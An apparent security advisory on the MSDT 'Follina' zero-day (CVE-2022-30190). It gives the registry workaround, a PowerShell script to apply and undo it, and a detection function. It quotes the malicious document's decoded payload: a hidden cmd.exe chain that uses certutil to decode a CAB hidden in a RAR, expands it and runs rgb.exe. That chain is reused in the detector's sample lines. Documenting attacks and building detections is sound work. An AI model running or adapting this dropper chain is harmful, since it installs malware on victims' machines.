Security researchers recently disclosed a high-risk zero-day code execution vulnerability that affects all currently supported Windows versions. There is evidence that attackers exploited it at least 7 weeks ago to install malicious programs on victims' devices without triggering Windows Defender or other endpoint protection products.
Researchers from the Shadow Chaser Group said on Twitter that they had reported the vulnerability in the Microsoft Support Diagnostic Tool (MSDT) to Microsoft on April 12, together with evidence that it was already being exploited by attackers.
In its reply to the researchers, however, the Microsoft Security Response Center did not consider the reported behavior a security vulnerability, on the grounds that the MSDT diagnostic tool requires a password before it will execute the payload.
On Monday, however, Microsoft changed its position, assigned the vulnerability the identifier CVE-2022-30190, and described it as a "critical" vulnerability.
"A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change or delete data, or create new accounts in the context of the user's privileges," the announcement said.
At the time of publication, Microsoft had not released a patch. Instead, it recommends that customers disable the MSDT URL protocol as follows:
1. Run Command Prompt as an administrator.
2. To back up the registry key, execute the command "reg export HKEY_CLASSES_ROOT\ms-msdt filename".
3. Execute the command "reg delete HKEY_CLASSES_ROOT\ms-msdt /f".
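The same workaround, wrapped so it can be checked before and after and undone once a patch is installed. This is an added example and not Microsoft's own script; the function names and the backup path are assumptions chosen for the example, and it must be run from an elevated PowerShell session.

```powershell
# Added example (not Microsoft's code): applies the published workaround of exporting
# and then deleting the ms-msdt protocol handler key, with a check and a restore path.
# Function names and the backup path below are assumptions for this example.

$ProtocolKey = 'HKCR:\ms-msdt'          # registry path of the MSDT URL protocol handler
$BackupFile  = 'C:\Backup\ms-msdt.reg'  # assumed backup location; adjust as needed

function Test-MsdtProtocolEnabled {
    # Returns $true while the ms-msdt protocol handler is still registered.
    if (-not (Get-PSDrive -Name HKCR -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null
    }
    return (Test-Path $ProtocolKey)
}

function Disable-MsdtProtocol {
    # Mirrors the two reg.exe steps from the advisory: back up first, then delete.
    if (-not (Test-MsdtProtocolEnabled)) {
        Write-Host 'ms-msdt handler is already absent; nothing to do.'
        return
    }
    New-Item -ItemType Directory -Path (Split-Path $BackupFile) -Force | Out-Null
    reg.exe export HKEY_CLASSES_ROOT\ms-msdt $BackupFile /y
    if ($LASTEXITCODE -ne 0) { throw 'Backup failed; the key was not deleted.' }
    reg.exe delete HKEY_CLASSES_ROOT\ms-msdt /f
    if ($LASTEXITCODE -ne 0) { throw 'Deleting the ms-msdt key failed.' }
    Write-Host "ms-msdt handler removed; backup saved to $BackupFile"
}

function Restore-MsdtProtocol {
    # Re-imports the exported key once the workaround is no longer needed.
    if (-not (Test-Path $BackupFile)) { throw "No backup found at $BackupFile" }
    reg.exe import $BackupFile
    if ($LASTEXITCODE -ne 0) { throw 'Importing the backup failed.' }
}

# Usage (elevated session):
Disable-MsdtProtocol
"Handler still registered: $(Test-MsdtProtocolEnabled)"
```

The backup is taken before the delete and the delete is skipped if the export fails, so the handler can always be restored with Restore-MsdtProtocol after patching.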
Although Microsoft initially overlooked it, the vulnerability resurfaced when researchers found that a Word document uploaded to VirusTotal on Friday exploited a previously unknown attack vector.
According to an analysis by researcher Kevin Beaumont, the document uses Word to retrieve an HTML file from a remote web server. The document then uses the ms-msdt protocol URI scheme to load and execute PowerShell commands.
In theory this should not be possible, but in practice it is. When the commands in the document are decoded, they become:
$cmd = "c:\Windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
According to Huntress's analysis, the script performs the following operations, all in a hidden window:
1. If msdt.exe is running, terminate it.
2. Loop through the files in the RAR archive to find the Base64 string that encodes a CAB file.
3. Store this Base64-encoded CAB file as 1.t.
4. Decode the Base64-encoded CAB file and save it as 1.c.
5. Use expand to extract the 1.c CAB file into the current directory.
6. Finally, execute rgb.exe (probably packed inside the 1.c CAB file).
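The decoded chain above leaves distinctive process command lines, which is what a defender would look for in process-creation telemetry. The following triage function is an added example and not Huntress's or Microsoft's code: it matches a few command-line patterns taken from the decoded commands against sample event lines that are constructed for the example, and the indicator names are my own.

```powershell
# Added example (not Huntress's or Microsoft's code): flags process command lines that
# match steps of the decoded chain described above. Feed it the command-line field from
# Sysmon Event ID 1 or Security Event ID 4688; the sample lines below are constructed.

$Indicators = @(
    @{ Name = 'msdt-protocol-handler';    Pattern = 'ms-msdt:' }
    @{ Name = 'msdt-killed-by-script';    Pattern = 'taskkill\s+/f\s+/im\s+msdt\.exe' }
    @{ Name = 'base64-cab-header-search'; Pattern = 'findstr\s+TVNDRgAAAA' }  # Base64 of the "MSCF" CAB magic
    @{ Name = 'certutil-decode';          Pattern = 'certutil(\.exe)?\s+-decode\b' }
    @{ Name = 'expand-cab-then-execute';  Pattern = 'expand\s+\S+\s+-F:\*\s+\.\s*&&' }
)

function Find-MsdtChainIndicators {
    # Emits one object per (command line, indicator) hit; a single line can hit several.
    param([string[]]$CommandLines)
    foreach ($line in $CommandLines) {
        foreach ($ind in $Indicators) {
            # -match is case-insensitive, which suits cmd.exe syntax; the Base64 header
            # check therefore tolerates case as well, at a small false-positive cost.
            if ($line -match $ind.Pattern) {
                [pscustomobject]@{ Indicator = $ind.Name; CommandLine = $line }
            }
        }
    }
}

# Constructed sample command lines (not real telemetry)
$Sample = @(
    '"C:\Windows\system32\cmd.exe" /c taskkill /f /im msdt.exe'
    '"C:\Windows\system32\cmd.exe" /c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe'
    'C:\Windows\system32\notepad.exe C:\Users\alice\notes.txt'
)

Find-MsdtChainIndicators -CommandLines $Sample | Format-Table -AutoSize
```

On the sample input the first line yields one hit and the second yields three (the Base64 header search, certutil -decode, and the expand-then-execute step), while the notepad line yields none. Any one of these patterns can appear in legitimate administration, so the value lies in several of them occurring together from a hidden cmd.exe shortly after an Office process.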